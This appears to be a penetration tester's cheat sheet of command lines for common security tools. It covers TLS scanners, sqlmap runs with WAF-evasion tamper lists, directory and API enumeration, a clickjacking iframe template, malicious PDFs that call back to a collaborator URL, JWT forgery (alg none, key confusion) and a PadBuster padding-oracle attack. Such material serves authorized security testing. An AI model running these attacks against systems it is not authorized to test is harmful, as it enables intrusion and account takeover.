TestSSL
https://github.com/drwetter/testssl.sh
./testssl.sh -f client.cloudfront.net > testSSL.txt
SSLyze
https://github.com/nabla-c0d3/sslyze
# Test for session renegotiation
sslyze --reneg client.cloudfront.net > sslyze_reneg.txt
Smuggler
https://github.com/defparam/smuggler
python3 ./smuggler.py -u client.cloudfront.net > smuggler.txt
OpenSSL
https://github.com/openssl/openssl
# Check for Weak Diffie-Hellman Parameters
openssl s_client -connect client.com:443 -cipher "EDH" 2>/dev/null | grep "Server Temp Key"
# Check OCSP Stapling
openssl s_client -connect google.com:443 -status -servername google.com
SSLScan
https://github.com/openssl/openssl
sslscan technoherder.com
# List any 3DES cipher suites that are still enabled
sslscan fakePentest.com | grep DES
YAWAST
https://github.com/adamcaudill/yawast
docker pull adamcaudill/yawast && docker run --rm -it adamcaudill/yawast scan technoherder.com --tdessessioncount
SQLMap
https://github.com/sqlmapproject/sqlmap
python3 ./sqlmap.py -r request.txt --risk=3 --level=5 --random-agent
./sqlmap.py -r request.txt --risk=3 --level=5 --random-agent --threads=5
./sqlmap.py -r request.txt --risk=3 --level=5 --random-agent --tamper="between,randomcase,space2comment" -v 3 -p subject --dbms MySQL
./sqlmap.py -r request.txt --risk=3 --level=5 --random-agent
./sqlmap.py -r request.txt -p 'JSON username' --risk=3 --level=5 --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,percentage,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
./sqlmap.py -r request.txt -p 'JSON username' --risk=3 --level=5 --cookie="_gcl_au=1.1.737317960.1647528948; _ga_4MGG2VTTQ7=GS1.1.1647954525.11.1.1647956818.49; _ga=GA1.1.696811828.1647528949; _fbp=fb.1.1647528949554.985154512; one-cookie=someValue"
./sqlmap.py -r request.txt -p 'JSON entityType' --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,percentage,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
./sqlmap.py --risk=3 --level=5 --random-agent -u "testing.io/gateway/v1/transactions/batches/test*/purchases/15cc333a-7c6f-46cd-bb6c-a0aa0a367e95" --headers="Authorization: Bearer eyJhbG"
Tamper scripts
MSSQL:
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
MySQL:
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
General Tamper testing:
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,percentage,randomcase,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
NoSQLMap
docker pull sdcampbell/nosqlmap && docker run --rm -ti sdcampbell/nosqlmap
ClickJacking
Change opacity to 0.0001 for malicious intent:
<style>
iframe {
position:relative;
Width:900;
height: 900;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
Top:500;
left:400;
z-index: 1;
}
</style>
<div>Test me</div>
<iframe src="$url"></iframe>
Gobuster
https://github.com/OJ/gobuster
# Use -k switch to ignore SSL check
# Use -z switch to hide the progress bar
gobuster dns -d targetDomainName -w /path/wordList
gobuster dir -u targetUrl -w wordList
gobuster dir -u https://technoherder.com/path/to/folder -c 'session=123456;other=xyz' -t 50 -w common-files.txt -x .php,.html
gobuster dir -u https://technoherder.io -w ~/wordlists/shortlist.txt --exclude-length 4587
gobuster dir -u https://technoherder.io -w ~/wordlists/shortlist.txt -q -n -e
gobuster dns -d technoherder.com -w ~/wordlists/subdomains.txt -i
gobuster fuzz -u https://technoherder.com?FUZZ=test -w parameter-names.txt
gobuster fuzz -u https://technoherder.io/gateway/v1/transactions/batches/test/purchases/actions/FUZZ/ -w API_Endpoints -H "Authorization: Bearer tokenValue" -b 404
gobuster fuzz -u https://testing.io/gateway/v1/transactions/batches/ -w API_Endpoints -H "Authorization: Bearer tokenValue" -b 404
Dirsearch
https://github.com/maurosoria/dirsearch
python3 dirsearch.py -u kmsparallel.com -e aspx,cs,html
# Simple usage
python3 dirsearch.py -u https://target
python3 dirsearch.py -e php,html,js -u https://target
python3 dirsearch.py -e php,html,js -u https://target -w /path/to/wordlist
Wfuzz
https://github.com/xmendez/wfuzz
docker run -v $(pwd)/wordlist:/wordlist/ -it ghcr.io/xmendez/wfuzz wfuzz
dnscaa
https://github.com/weppos/dnscaa
Follow these instructions to install dnscaa:
apt-get update && apt-get install golang
mkdir ~/go
git clone https://github.com/weppos/dnscaa.git
cd dnscaa
go mod init github.com/weppos/dnscaa
go mod tidy
go build cmd/digcaa/digcaa.go
# To run CAA tool:
./digcaa google.com
Malicious PDF Generator
https://github.com/jonaslejon/malicious-pdf
Usage
python3 malicious-pdf.py burp-collaborator-url
Output will be written as: test1.pdf, test2.pdf, test3.pdf etc in the current directory.
Do not include a scheme prefix (e.g. https://) in the URL argument.
Assetfinder
https://github.com/tomnomnom/assetfinder
Install
If you have Go installed and configured (i.e. with $GOPATH/bin in your $PATH):
go get -u github.com/tomnomnom/assetfinder
Otherwise download a release for your platform. To make it easier to execute you can put the binary in your $PATH.
Usage
assetfinder [--subs-only] <domain>
Kiterunner
https://github.com/assetnote/kiterunner
# build the binary
make build
# symlink your binary
ln -s $(pwd)/dist/kr /usr/local/bin/kr
# compile the wordlist
# kr kb compile <input.json> <output.kite>
kr kb compile routes.json routes.kite
# scan away
kr scan hosts.txt -w routes.kite -x 20 -j 100 --ignore-length=1053
JWT
# Simple decode
python3 jwt_tool.py <JWT>
# Changes alg to None
python3 jwt_tool.py <<JWT_TOKEN>> -X a
# Run all tests (-M at) against the target endpoint, replaying the supplied Authorization header
python3 jwt_tool.py -M at -t "https://api.example.com/api/v1/user/76bab5dd-9307-ab04-8123-fda81234245" -rh "Authorization: Bearer eyJhbG...<JWT Token>"
Sign the JWT with the server's public certificate after switching the algorithm to HS256
(if the server accepts the token, its claim values can be changed)
# Fetch the server certificate (it carries the public key)
openssl s_client -connect <hostname>:443
# Copy the server certificate into a new file
nano cert.pem
-----BEGIN CERTIFICATE-----
MIIGJTCCBQ2gAwIBAgIQDDaea1XwVFbuw0e+PqAE5TANBgkqhkiG9w0BAQsFADBG
MQswCQYDVQQGEwJVUzEPMA0GA1UEChMGQW1hem9uMRUwEwYDVQQLEwxTZXJ2ZXIg
-----END CERTIFICATE-----
# Then
python3 jwt_tool.py <<JWT_TOKEN>> -X k -pk <<PUBKEY.PEM>>
python3 jwt_tool.py <<JWT_TOKEN>> -X k -pk cert.pem
OpenVAS
https://github.com/greenbone/openvas-scanner
docker run -d -p 443:443 --name openvas mikesplain/openvas
https://127.0.0.1/login/login.html
Username: admin
Password: admin (image default credentials — change them after first login)
PadBuster
# install on Kali
sudo apt-get install padbuster
# Arguments: target URL, the encrypted sample, the block size (8 here), then the cookies via -cookies
padbuster https://example.com/Admin/Index 2505B841676B218E241A3E6CDBBCDCF27F721D3220D5EE23C44A54A1B0F9FE1D7439EA1D37F6478E2F1F56B97FC46A665BA18E2EDA37A9B72FC6E555AFB0C721B94E94A65F6FD6D0262A3FD195A27A02BBC8024B47C1E3ECDF714E3187D68DEE 8 -cookies 'ASP.NET_SessionId=3zrjluarj5nkig4kmp5qi20w;.ASPXFORMSAUTH=2505B841676B218E241A3E6CDBBCDCF27F721D3220D5EE23C44A54A1B0F9FE1D7439EA1D37F6478E2F1F56B97FC46A665BA18E2EDA37A9B72FC6E555AFB0C721B94E94A65F6FD6D0262A3FD195A27A02BBC8024B47C1E3ECDF714E3187D68DEE'